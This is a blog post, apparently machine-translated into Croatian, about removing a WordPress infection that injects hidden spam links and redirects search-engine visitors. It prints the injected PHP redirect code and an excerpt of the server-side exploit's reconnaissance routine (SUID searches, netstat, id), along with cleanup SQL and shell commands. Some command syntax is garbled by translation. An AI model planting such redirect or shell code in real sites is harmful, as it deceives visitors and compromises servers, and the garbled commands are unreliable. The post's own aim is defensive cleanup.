U posljednjih mjesec dana stalno sam dobivao upozorenja od virus u blogu od nekih posjetitelja. U početku sam ignorirao upozorenja, jer sam imao instaliran prilično dobar antivirus (Kaspersky AV 2009) i iako sam dugo vremena proveo na blogu, nikada nisam dobio upozorenje o virusu (.. prije nekog vremena sam vidio nešto sumnjivo, što je nestalo pri prvom osvježavanju. konačno...).
Polako, polako su se počele pojavljivati velike varijacije promet posjetitelja, nakon čega je u zadnje vrijeme promet konstantno smanjen i počelo je biti sve više ljudi koji mi to govore stealthsettings.com jest virusat. Jučer sam od nekoga dobio snimak zaslona snimljen kada ga je antivirusni program blokirao scenarij sa stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Bilo mi je dovoljno uvjerljivo da sam ga počeo tražiti u svim izvorima. Prva ideja koja mi je pala na pamet bila je da to učinim nadogradnja na najnoviju verziju Wordpress (2.5.1), ali ne prije nego što izbrišete sve stare datoteke WordPress skripte i to učinite sigurnosna kopija baze podataka. Ovaj postupak nije dao nikakve rezultate i vjerojatno bi mi trebalo dugo da shvatim gdje je greška, da mi nije rekao Eugen u raspravi uz kavu, da je našao poveznica na Googleu i bilo bi ga dobro vidjeti.
MyDigitalLife.info, objavio je članak pod naslovom: "WordPress Hack: oporavite i popravite Google i tražilicu ili promet bez kolačića preusmjeren na Your-Needs.info, AnyResults.Net, Golden-Info.net i druge ilegalne stranice“, što je kraj teme koja mi je trebala.
Riječ je o a iskorištavati od strane WordPressa na temelju kolačića, koji je po meni vrlo složen i napravljen po knjizi. Dovoljno pametan da ga napravi SQL injekcija u bazi podataka bloga,, za stvaranje nevidljivog korisnika do jednostavne rutinske provjere od Nadzorna ploča->Korisnici,, za provjeru "writable" direktorija i datoteka na poslužitelju (koji imaju chmod 777), to search i to izvršiti datoteke s grupnim ili čak root privilegijama. Ne znam naziv exploit-a i vidim da je o njemu napisano malo članaka, unatoč činjenici da postoji mnogo zaraženih blogova, uključujući i iz Rumunjske. U redu... pokušat ću objasniti općenitosti o ovom virusu.
Što radi virus?
Prije svega, u izvore stranica na blogovima ubacuje nevidljive poveznice za posjetitelje, ali vidljive i indeksirane za tražilice, posebno Google. Na ovaj način prenijeti Page Rank na stranice koje je označio napadač. Drugo, umetnut je još jedan kod za preusmjeravanje URL, za posjetitelje koji dolaze s Googlea, Livea, Yahooa, ... ili s RSS čitača, a nemaju tu stranicu kolačić. I antivirus detektira ovo preusmjeravanje kao Trojan-Clicker.HTML.
Simptomi::
Ogroman pad prometa posjetitelja, posebno na blogovima gdje većina posjetitelja dolazi s Googlea.
Identificirati: (ovdje se problem komplicira za one koji ne znaju puno o phpmyadminu, php-u i linuxu)
THE. OPREZNO!!! PRVO NAPRAVITE BACKUP BAZE PODATAKA!!!
1. Provjerite izvore datoteka indeks.php,, zaglavlje.php,, podnožje.php, iz teme bloga i provjerite postoji li kod koji koristi enkripciju baza64 ili sadrži "if($ser=="1? && sizeof($_COOKIE)==0)” u obliku:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>...ili nešto slično. Izbriši ovaj kod!
Kliknite na zamisli…
Na gornjoj snimci zaslona pogrešno sam odabrao "<?php get_header(); ?>Taj kod mora ostati.
2. Koristite phpmyadmin i idite na tablicu u bazi podataka wp_korisnici, gdje provjerite postoji li korisnik bez imena, kreiran na 00:00:00 0000-00-00 (može i na terenu korisnička_prijava napišite "WordPress". Zapišite ID ovog korisnika (ID polje) i zatim ga izbrišite.
Kliknite na zamisli…
*onaj na zelenoj liniji, njegov ID se mora izbrisati i zadržati. U njegovom slučaju uspavan, bio je ID=8 .
3. Idi do stola wp_usermeta, gdje se mora nalazi se ti si IZBRISATI retke koji se odnose na ID (gdje u polju user_id pojavljuje se vrijednost izbrisanog ID-a).
4. U tablici wp_opcija, uđi aktivni_dodaci i vidjeti koji je dodatak sumnjivo aktiviran. Može koristiti završetke poput _old.gif, _old.pngg, _old.jpeg, _new.php.gif, itd. kombinacije lažnih ekstenzija slika sa _staro i _novo.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Izbrišite ovaj dodatak, a zatim idite na blog –> Nadzorna ploča –> Plugins, gdje deaktivirate i aktivirate određeni dodatak.
Kliknite na sliku da vidite kako zaražena datoteka izgleda u active_plugins.
Slijedite FTP ili SSH put naveden u active_plugins i izbrišite datoteku s poslužitelja.
5. Također u phpMyAdmin, u tablici wp_opcija, pronađite i izbrišite redak koji sadrži "rss_f541b3abd05e7962fcab37737f40fad8"i okrenuti"interne_links_cache”.
U internal_links_cacheu spam veze koje se pojavljuju na blogu i a Google Adsense kod, hakera.
6. Preporuča se da ti Promijenite lozinku prijavljivanja na blog i tako uklonite sve sumnjive korisnike. Nadogradite na najnoviju verziju WordPressa i postavite blog da više ne dopušta registraciju novih korisnika. Nema gubitka... čak i neprijavljeni mogu komentirati.
Pokušao sam gore objasniti koliko, što učiniti u takvoj situaciji, očistiti blog od ovog virusa. Problem je puno ozbiljniji nego što se čini i nije daleko od rješenja jer se koriste sigurnosne ranjivosti hosting web poslužitelja na kojem se nalazi blog.
Kao prva sigurnosna mjera, tko ima pristup Ssh, da izvršim neke provjere na poslužitelju da vidim postoje li još datoteke poput *_old* i *_new.* sa završecima .gif, .jpeg, .pngg, .jpgg. Ove datoteke moraju biti izbrisane. Ako preimenujemo datoteku, npr. gore_desno_stari.gif u gore_desno_stari.php, vidimo da datoteka sadrži točno šifru iskorištavanja poslužitelja.
Nekoliko korisnih savjeta za provjeru, čišćenje i osiguranje poslužitelja. (putem SSH)
1. cd /tmp i provjerite postoje li takvi folderi tmpVFlma ili druge slične kombinacije naziva i izbrišite ga. Na snimci zaslona u nastavku možete vidjeti dvije takve mape za mene:
rm –rf broj mape
2. Provjerite i eliminirajte (promijenite chmod) što je više moguće mapa s atributima chmod 777
pronađi sve datoteke za pisanje u trenutnom direktoriju: naći . -tip f -perm -2 -l
pronađi sve direktorije za pisanje u trenutnom direktoriju: naći . -tip d -perm -2 -l
pronađi sve direktorije i datoteke u koje se može pisati u trenutnom direktoriju: naći . -perm -2 –l
3. Potražite sumnjive datoteke na poslužitelju.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, OPREZNO!!! na datoteke koje postavljaju bit JUG i Klizati. Te se datoteke pokreću s povlasticama korisnika (grupe) ili roota, a ne s povlasticama korisnika koji izvršava datoteku. Ove datoteke mogu dovesti do ugrožavanja roota ako postoje sigurnosni problemi. Ako ne koristite datoteke sa SUID i SGID bitovima, pokrenite "chmod 0” na njih ili deinstalirati paket koji ih sadrži.
Eksploatacija sadrži negdje u izvoru...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}...praktički na taj način pronalazi sigurnosne propuste. Otvoreni portovi, "writable" direktoriji i izvođenje datoteka s grupnim/root privilegijama.
Vratit ću se s detaljima...
Neki zaraženi blogovi: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... a popis se može nastaviti ... puno.
Možete provjeriti je li blog zaražen pomoću Google tražilice. kopirati & zalijepiti:
web mjesto:www.blegoo.com kupiti
Laku noć i dobar rad ;) Mislim da će Eugen uskoro doći s novostima, na prevezibil.imprevizibil.com.
brb :)
AT: PAŽNJA! Promjena teme WordPressa ili nadogradnja na WordPress 2.5.1 NIJE rješenje da se riješite ovog virusa.
